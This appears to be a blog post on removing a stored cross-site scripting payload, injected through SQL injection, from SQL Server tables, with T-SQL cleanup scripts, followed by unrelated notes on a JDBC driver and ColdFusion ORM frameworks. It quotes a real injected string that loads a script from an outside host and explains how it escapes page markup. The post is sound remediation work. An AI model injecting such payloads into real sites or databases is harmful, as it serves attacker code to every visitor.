In my previous post, What is a SQL Injection Attack, I gave a brief overview of SQL injection and Cross-Site Scripting (XSS), primarily with regard to websites. In the example given, we saw that an attack could take the form of a crafted URL whose parameter contained either a literal SQL statement or a hexadecimal-encoded one, which an application that builds its queries insecurely hands straight to the database server to decode and execute.

Whichever method is used to inject the SQL, and with it the dangerous script, into the database, we need to know how to deal with the problem and ‘roll it back’ to a safe state.

If you have an up-to-date backup taken before the attack, restoring it is the best course of action (bearing in mind that any legitimate changes made since that backup are lost too). If not, apart from giving yourself a kick for not implementing a backup policy, it is possible to programmatically remove the injected string using a set of relatively simple SQL queries. Either way, cleaning the data does not close the hole: until the vulnerable query itself is fixed, the same attack can simply be repeated.

Programmatically Replace Injected Code

Fortunately, in this kind of attack the injected UPDATE appends the script tag to the data already in each column rather than replacing it, which means we simply need to strip the appended content. It is worth spot-checking a few affected rows first to confirm that the original data ahead of the payload is intact; if it is not, the data cannot be repaired this way and a backup is your only option.

Taking a real-world example, below is the string that was injected into the database:

"></title><script src="http://1.verynx.cn/w.js"></script><!--

When a page renders a column containing this string, one of two things happens. If the output is HTML-encoded, the string is merely displayed to the visitor as text. If it is not, the leading "> closes whatever attribute or tag the value was placed in (</title> covers the case where it landed in the page title), the browser fetches and runs w.js from the attacker’s server in the context of your site, and the trailing <!-- hides the markup that follows so the tampering is less obvious. In that case every visitor to the page is served a stored cross-site scripting payload.

With the example above, the following script lists every character column (char, nchar, varchar, nvarchar, text and ntext) of every base table in the database and generates an UPDATE statement for each one. The WHERE clause in each generated statement means only rows that actually contain the payload are rewritten. Names are wrapped with QUOTENAME so that tables and columns containing spaces or reserved words still work, views are excluded (information_schema.columns lists their columns too), and the CAST is what lets REPLACE operate on text and ntext columns. Note that on SQL Server 2000 that CAST truncates any value longer than 8000 characters (4000 for the Unicode types); on SQL Server 2005 change the casts to varchar(max) and nvarchar(max).

SELECT 'UPDATE ' + QUOTENAME(c.table_schema) + '.' + QUOTENAME(c.table_name) + '
SET ' + QUOTENAME(c.column_name) + ' = REPLACE(CAST(' + QUOTENAME(c.column_name) + ' AS '
    + CASE WHEN c.data_type IN ('nchar', 'nvarchar', 'ntext') THEN 'nvarchar(4000)' ELSE 'varchar(8000)' END
    + '), ''"></title><script src="http://1.verynx.cn/w.js"></script><!--'', '''')
WHERE ' + QUOTENAME(c.column_name) + ' LIKE ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--%'''
FROM information_schema.columns AS c
JOIN information_schema.tables AS t ON t.table_schema = c.table_schema AND t.table_name = c.table_name
WHERE t.table_type = 'BASE TABLE'
  AND c.data_type IN ('char', 'nchar', 'varchar', 'nvarchar', 'text', 'ntext')
  AND c.table_name NOT LIKE 'dt%'   -- diagram tables created by Enterprise Manager
  AND c.table_name NOT LIKE 'sys%'  -- system tables

The result set is one UPDATE statement per column, like the following (I have masked the actual table and column names):

UPDATE [dbo].[tableName]
SET [columnName] = REPLACE(CAST([columnName] AS varchar(8000)), '"></title><script src="http://1.verynx.cn/w.js"></script><!--', '')
WHERE [columnName] LIKE '%"></title><script src="http://1.verynx.cn/w.js"></script><!--%'

These update statements can be copied into and run in Query Analyzer for Microsoft SQL Server 2000, or SQL Server Management Studio for Microsoft SQL Server 2005. Take a fresh backup first, and run them inside a transaction (BEGIN TRANSACTION ... COMMIT) so that a mistake can be rolled back before it is made permanent.

If the injected code is different, change the literal in the script above to suit your needs. Remember that any single quote in the payload must be doubled once for the generated statement and doubled again inside the generating SELECT, and that %, _ and [ are LIKE wildcards that must be escaped (or matched with an ESCAPE clause) if the payload contains them.
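The generator above is a copy-and-paste workflow, and every change of payload means redoing the quote-doubling by hand. The following is an added example, not the post’s own script, of the same cleanup written for SQL Server 2005 or later. It runs against the current database, reports the number of infected rows per column as a dry run by default (@dryRun = 1), and when switched to @dryRun = 0 removes the payload inside one transaction and rolls back if any column still matches afterwards. The payload is handed to sp_executesql as a parameter so it never needs quote-escaping, LIKE wildcards in it are escaped through an ESCAPE clause, and the CAST to nvarchar(max) avoids the 8000/4000-character truncation of the SQL Server 2000 version. The variable names (@payload, @pattern, @dryRun, @found, @leftover) are my own.

```sql
-- Added example, not the original post's script. Runs against the current database on
-- SQL Server 2005 or later. Dry run by default: it only reports infected rows per column.
-- Set @dryRun = 0 to clean; the cleanup runs in one transaction and is rolled back if
-- any column still matches afterwards.
SET NOCOUNT ON;

DECLARE @dryRun bit;
SET @dryRun = 1;

DECLARE @payload nvarchar(4000);
SET @payload = N'"></title><script src="http://1.verynx.cn/w.js"></script><!--';

-- Build the LIKE pattern with \, %, _ and [ escaped so they match literally (ESCAPE '\' below).
DECLARE @pattern nvarchar(4000);
SET @pattern = N'%' + REPLACE(REPLACE(REPLACE(REPLACE(@payload,
                   N'\', N'\\'), N'%', N'\%'), N'_', N'\_'), N'[', N'\[') + N'%';

DECLARE @schema sysname, @table sysname, @column sysname;
DECLARE @sql nvarchar(max), @hits int, @found int, @leftover int;
SET @found = 0;
SET @leftover = 0;

-- Every character column of a base table; views also appear in information_schema.columns.
DECLARE cols CURSOR LOCAL FAST_FORWARD FOR
    SELECT c.table_schema, c.table_name, c.column_name
    FROM information_schema.columns AS c
    JOIN information_schema.tables AS t
      ON t.table_schema = c.table_schema AND t.table_name = c.table_name
    WHERE t.table_type = 'BASE TABLE'
      AND c.data_type IN ('char', 'nchar', 'varchar', 'nvarchar', 'text', 'ntext');

BEGIN TRANSACTION;
OPEN cols;
FETCH NEXT FROM cols INTO @schema, @table, @column;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Count the rows in this column that carry the payload.
    SET @sql = N'SELECT @hits = COUNT(*) FROM ' + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
             + N' WHERE ' + QUOTENAME(@column) + N' LIKE @pattern ESCAPE N''\''';
    EXEC sp_executesql @sql, N'@pattern nvarchar(4000), @hits int OUTPUT', @pattern, @hits OUTPUT;

    IF @hits > 0
    BEGIN
        PRINT QUOTENAME(@schema) + N'.' + QUOTENAME(@table) + N'.' + QUOTENAME(@column)
            + N': ' + CAST(@hits AS nvarchar(10)) + N' infected row(s)';
        SET @found = @found + @hits;

        IF @dryRun = 0
        BEGIN
            -- nvarchar(max) avoids the 8000/4000 character truncation of the SQL Server 2000
            -- CAST; the result converts back to the column's own type on assignment.
            SET @sql = N'UPDATE ' + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
                     + N' SET ' + QUOTENAME(@column) + N' = REPLACE(CAST(' + QUOTENAME(@column)
                     + N' AS nvarchar(max)), @payload, N'''')'
                     + N' WHERE ' + QUOTENAME(@column) + N' LIKE @pattern ESCAPE N''\''';
            EXEC sp_executesql @sql, N'@payload nvarchar(4000), @pattern nvarchar(4000)', @payload, @pattern;

            -- Verify: re-count this column; anything still matching forces a rollback below.
            SET @sql = N'SELECT @hits = COUNT(*) FROM ' + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
                     + N' WHERE ' + QUOTENAME(@column) + N' LIKE @pattern ESCAPE N''\''';
            EXEC sp_executesql @sql, N'@pattern nvarchar(4000), @hits int OUTPUT', @pattern, @hits OUTPUT;
            SET @leftover = @leftover + @hits;
        END
    END
    FETCH NEXT FROM cols INTO @schema, @table, @column;
END
CLOSE cols;
DEALLOCATE cols;

IF @dryRun = 1
BEGIN
    ROLLBACK TRANSACTION;
    PRINT N'Dry run: ' + CAST(@found AS nvarchar(10)) + N' infected row(s) found, nothing changed.';
END
ELSE IF @leftover > 0
BEGIN
    ROLLBACK TRANSACTION;
    PRINT N'Rolled back: ' + CAST(@leftover AS nvarchar(10)) + N' row(s) still match after cleanup.';
END
ELSE
BEGIN
    COMMIT TRANSACTION;
    PRINT N'Committed: payload removed from ' + CAST(@found AS nvarchar(10)) + N' row(s).';
END
```

Run it once with @dryRun = 1 and check the reported columns against what you expect to be affected before switching to @dryRun = 0. Because the whole cleanup sits in a single transaction, the updated tables stay locked until it commits, so on a large database schedule it for a quiet period and, as with the original script, take a backup first.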

You can download the SQL rollback script for your own needs.

Prevent a Successful Attack

As the popular idiom goes, prevention is better than cure. In my next post I will discuss how to mitigate SQL injection attacks on ColdFusion-based websites before they become a problem.

Download the SQL Server 2005 JDBC Driver 1.2, a Type 4 JDBC driver that provides database connectivity through the standard JDBC application programming interfaces (APIs) available in J2EE (Java 2 Platform, Enterprise Edition).

This release of the JDBC driver is JDBC 3.0 compliant and runs on the Java Development Kit (JDK) version 1.4 and higher. It has been tested against all major application servers, including BEA WebLogic, IBM WebSphere, JBoss, and Sun.

Object-Relational Mapping (or ORM) is a programming technique that links databases to object-oriented language concepts, creating (in effect) a “virtual object database.” There are both free and commercial packages available that perform object-relational mapping, although some programmers opt to code their own object-relational mapping for their systems.

In object-oriented programming, programming objects represent real-world objects. To illustrate, consider the example of an address book, which contains listings of people along with zero or more phone numbers and zero or more addresses. In object-oriented terms this would be represented by a “person object” with “slots” (fields, members, instance variables etc.) to hold the data that make up this listing: the person’s name, a list (or array) of phone numbers, and a list of addresses.

The crux of the problem is in translating those objects to forms which can be stored in files or databases, and which can later be retrieved easily while preserving the properties of the objects and their relationships; these objects can then be said to be persistent.

Object-relational mapping systems attempt to solve this problem by providing libraries of classes which are able to do this mapping automatically. Given a list of tables in the database and the objects in the program, they will automatically map requests from one to the other. Asking a person object for its phone numbers will result in the proper query being created and sent, and the results being “magically” translated directly into phone number objects inside the program.

From a programmer’s perspective, the system looks like a persistent object store. One can create objects and work with them as one would normally, and they automatically end up in the relational database.

A number of ORM frameworks have been created for ColdFusion:

Reactor

Reactor, created by Doug Hughes of Alagad fame, is a very simple API for ColdFusion which generates and instantiates database abstraction CFCs on the fly as needed.

http://www.doughughes.net/

Arf!

Active Record Factory (Arf!) is a Rails-style ActiveRecord implementation in ColdFusion.

Below is a list of the basics that Arf! provides:

  • JDBC metadata based reflection: not database specific
  • Creates ActiveRecord API’d instances out of CFCs that extend a base ActiveRecord component
  • Implements hasMany() and belongsTo() methods for establishing Record properties that point to other tables
  • Allows for overloading any of the automagically generated methods to add custom business logic
  • Automagic methods on Records include GetInstance(), Create(), Read(), Update(), Delete(), Save() [smart create/update], List(orderBy, whereClause), Validate() [does type and length checking], and SetNNN()/GetNNN() methods for each DB column

http://www.clearsoftware.net/

objectBreeze

Developed by Nicholas Tunney, objectBreeze is an ORM tool that allows you to interact with your data persistence layer and easily model objects within your ColdFusion applications. With no setup, objectBreeze will instantly create objects directly from your database schema. objectBreeze requires that your table has a primary key defined. Currently, objectBreeze works with Microsoft SQL Server, Oracle, MySQL and PostgreSQL, but support for other databases is on the way.

http://www.objectbreeze.com/ob/

cfcPowerTools

Batch generation of your data layer objects in minutes.

http://cfcpowertools.com/

Transfer

Transfer was built out of a need to speed up the development process that is normally slowed down by the development of Business Objects and Data Access Objects.

Transfer does this through a series of methods, including SQL generation and CFML code generation, that all occur during the run-time process.

All this is configured through an XML file that maps your object generation back to the tables and columns in your database.

http://www.compoundtheory.com/